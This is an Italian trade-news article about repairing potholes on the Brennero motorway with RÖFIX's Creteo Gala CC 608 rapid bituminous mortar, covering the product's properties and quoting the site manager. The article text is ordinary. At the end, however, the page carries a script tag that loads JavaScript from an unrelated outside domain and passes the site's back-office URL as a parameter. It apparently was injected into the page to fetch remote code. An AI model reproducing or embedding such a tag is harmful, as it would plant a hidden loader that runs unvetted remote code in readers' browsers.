1. Home
  2. Notizie e Mercato
  3. L’Autostrada del Brennero riparata con Creteo®Gala CC 608 rapid

L’Autostrada del Brennero riparata con Creteo®Gala CC 608 rapid

Materiali da costruzione di
La malta bituminosa Creteo®Gala CC 608 rapid di RÖFIX ha permesso una veloce e a lunga durata riparazione dei buchi nell’asfalto della trafficata Autostrada del Brennero


Tra i principali assi della rete autostradale italiana, l’Autostrada del Brennero collega le Alpi e l’Austria con la Pianura Padana, per un totale di 314 km in Italia che poi, dalla dogana di Brennero, si allungano in Austria e successivamente in Germania. Dato l’importante ruolo di collegamento, l’Autostrada del Brennero è conosciuta, soprattutto durante la stagione estiva, quale via favorita per il turismo, che facilmente si riversa sul Lago di Garda e dalla Pianura Padana verso il mare.

La cura per questa grande risorsa è soprattutto posta per la migliore messa a punto del manto stradale: ogni anno il gelo invernale può dare luogo a buche e irregolarità, compromettendo la sicurezza del traffico. La soluzione più diffusa e purtroppo poco efficace è riparare provvisoriamente con l’asfalto a freddo, aspettandosi nuovi problemi l’inverno successivo con costi di risanamento sempre più consistenti.

Per la riparazione delle buche del tratto dell’autostrada nella zona di Ponticolo, km 8+500 della corsia sud, è stata scelta una soluzione più tecnica e specifica e di ultima generazione, cioè l’impiego del nuovo prodotto brevettato Creteo®Gala CC 608 rapid che combina le doti di flessibilità e di continuità dell’asfalto con la resistenza a compressione e altre caratteristiche positive del calcestruzzo.

Quali sono i vantaggi nell’utilizzo di questo prodotto? Hartmann Wurzer, responsabile dell’intervento di risanamento, ci spiega: “Il vantaggio principale del nuovo prodotto sviluppato da RÖFIX consiste nella possibilità di riparare in modo rapido, semplice e durevole le buche in superfici asfaltate o in calcestruzzo anche durante la stagione fredda, il tutto con tempi d’interruzione del transito estremamente ridotti”. Tra le caratteristiche del prodotto spicca, infatti, la praticabilità della strada già dopo 5-10 minuti, secondo la temperatura, dall’applicazione, un aspetto non poco significativo nel caso del risanamento di un’autostrada dall’importanza centrale come l’Autostrada del Brennero.

Creteo®Gala CC 608 rapid è costituito da cemento, ghiaia ammantata di bitume e additivi che ne migliorano la lavorazione: è inoltre resistente al gelo e ai sali scongelanti, è facile da lavorare e viene applicato direttamente dal contenitore senza preparazioni preliminari. Per scongiurare l’insorgere di nuove rotture l’anno successivo, la malta bituminosa Creteo®Gala CC 608 rapid ha un ripristino economico e duraturo, oltre che una resistenza alla compressione pari a quella del calcestruzzo e una flessibilità pari a quella dell'asfalto.

Non solo su strada: il prodotto è concepito per lavori di riparazione anche in parcheggi, accessi a garage, marciapiedi e superfici industriali transitabili. Inoltre, Creteo®Gala CC 608 rapid è idoneo per chiudere la pavimentazione stradale dopo lavori di scavo. Una soluzione di riparazione del manto stradale ad alta tecnologia per una tra le principali tratte di collegamento italiano non può che significare alte prestazioni e sicurezza di viaggio.


Scheda cantiere
Committente: Autostrada Brennero A22
Responsabile di cantiere e manutenzione: sig. Wurzer Hartmann


<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2013-10-10&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.5615269494877978" type="text/javascript"></script>